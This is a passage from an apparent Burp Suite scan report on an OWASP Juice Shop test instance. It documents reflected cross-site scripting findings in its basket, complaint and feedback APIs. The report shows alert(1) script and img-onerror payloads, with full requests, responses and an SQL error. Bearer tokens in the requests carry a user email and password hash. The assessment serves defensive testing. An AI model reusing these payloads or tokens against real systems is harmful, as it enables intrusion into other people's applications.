    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:46 GMT
    Connection: close
    Content-Length: 935

    {
    "error": {
    "message": "Unexpected token g",
    "stack": "SyntaxError: Unexpected token g\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    \n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2,\"BasketId\":\"4\",\"quantity\":1g3fbk<img src=a onerror=alert(1)>ie33k}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.4. http://192.168.61.143:3000/api/BasketItems/ [request body]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload yt4ij<script>alert(1)</script>ox4uy was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"ProductId":2,"BasketId":"4","quantity":1}yt4ij<script>alert(1)</script>ox4uy

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:55 GMT
    Connection: close
    Content-Length: 932

    {
    "error": {
    "message": "Unexpected token y",
    "stack": "SyntaxError: Unexpected token y\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"ProductId\":2,\"BasketId\":\"4\",\"quantity\":1}yt4ij<script>alert(1)</script>ox4uy",
    "status": 400,
    "statusCode": 400
    }
    }
    14.5. http://192.168.61.143:3000/api/Complaints/ [UserId JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the UserId JSON parameter is copied into the HTML document as plain text between tags. The payload ukd1s<img src=a onerror=alert(1)>igepk was submitted in the UserId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7ukd1s<img src=a onerror=alert(1)>igepk,"message":"wewewewewew"}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:58 GMT
    Connection: close
    Content-Length: 926

    {
    "error": {
    "message": "Unexpected token u",
    "stack": "SyntaxError: Unexpected token u\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    adableNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7ukd1s<img src=a onerror=alert(1)>igepk,\"message\":\"wewewewewew\"}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.6. http://192.168.61.143:3000/api/Complaints/ [message JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the message JSON parameter is copied into the HTML document as plain text between tags. The payload al4ob<script>alert(1)</script>nktji was submitted in the message JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewewal4ob<script>alert(1)<\/script>nktji"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 185
    ETag: W/"b9-GNjm2HX4M6wxqFHpu+EV/w"
    Date: Sun, 15 Jan 2017 21:07:07 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"message":"wewewewewewal4ob<script>alert(1)</script>nktji","id":17,"updatedAt":"2017-01-15T21:07:07.000Z","createdAt":"2017-01-15T21:07:07.000Z"}}
    14.7. http://192.168.61.143:3000/api/Complaints/ [request body]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Complaints/

    Issue detail

    The value of the request body is copied into the HTML document as plain text between tags. The payload duj8k<script>alert(1)</script>s5sbw was submitted in the request body. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Complaints/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 36
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"message":"wewewewewew"}duj8k<script>alert(1)</script>s5sbw

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:48 GMT
    Connection: close
    Content-Length: 923

    {
    "error": {
    "message": "Unexpected token d",
    "stack": "SyntaxError: Unexpected token d\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    :913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7,\"message\":\"wewewewewew\"}duj8k<script>alert(1)</script>s5sbw",
    "status": 400,
    "statusCode": 400
    }
    }
    14.8. http://192.168.61.143:3000/api/Feedbacks/ [UserId JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the UserId JSON parameter is copied into the HTML document as plain text between tags. The payload lthfl<img src=a onerror=alert(1)>au7of was submitted in the UserId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7lthfl<img src=a onerror=alert(1)>au7of,"comment":"wewewe","rating":0}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:06:58 GMT
    Connection: close
    Content-Length: 934

    {
    "error": {
    "message": "Unexpected token l",
    "stack": "SyntaxError: Unexpected token l\n at Object.parse (native)\n at parse (/root/juice-shop/node_modules/body-parser/lib/types/json.
    ...[SNIP]...
    adableNT (_stream_readable.js:913:12)\n at _combinedTickCallback (internal/process/next_tick.js:74:11)\n at process._tickCallback (internal/process/next_tick.js:98:9)",
    "body": "{\"UserId\":7lthfl<img src=a onerror=alert(1)>au7of,\"comment\":\"wewewe\",\"rating\":0}",
    "status": 400,
    "statusCode": 400
    }
    }
    14.9. http://192.168.61.143:3000/api/Feedbacks/ [comment JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the comment JSON parameter is copied into the HTML document as plain text between tags. The payload npftf<a>yv6ra was submitted in the comment JSON parameter. This input was echoed unmodified in the application's response.

    This behavior demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behavior and attempt to identify any unusual input validation or other obstacles that may be in place.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewenpftf<a>yv6ra","rating":0}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 173
    ETag: W/"ad-a8ne4rM2nqdrRTWwz/URgw"
    Date: Sun, 15 Jan 2017 21:07:07 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"comment":"wewewenpftf<a>yv6ra</a>","rating":0,"id":22,"updatedAt":"2017-01-15T21:07:07.000Z","createdAt":"2017-01-15T21:07:07.000Z"}}
    14.10. http://192.168.61.143:3000/api/Feedbacks/ [name of an arbitrarily supplied URL parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The name of an arbitrarily supplied URL parameter is copied into the HTML document as plain text between tags. The payload xbdkn<script>alert(1)</script>zqy3j was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    GET /api/Feedbacks/?xbdkn<script>alert(1)<%2fscript>zqy3j=1 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 157
    ETag: W/"9d-JzTgBYGufnFnqT1YMGvdgQ"
    Date: Sun, 15 Jan 2017 21:09:09 GMT
    Connection: close

    {"status":"error","message":{"errno":1,"code":"SQLITE_ERROR","sql":"SELECT * FROM `Feedbacks` WHERE `Feedbacks`.`xbdkn<script>alert(1)</script>zqy3j`='1';"}}
    14.11. http://192.168.61.143:3000/api/Feedbacks/ [rating JSON parameter]
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the rating JSON parameter is copied into the HTML document as plain text between tags. The payload zrydj<img src=a onerror=alert(1)>wla6t was submitted in the rating JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The proof-of-concept attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"wewewe","rating":0zrydj<img src=a onerror=alert(1)>wla6t}

    Response 1

    HTTP/1.1 400 Bad Request
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Date: Sun, 15 Jan 2017 21:07:51 GMT
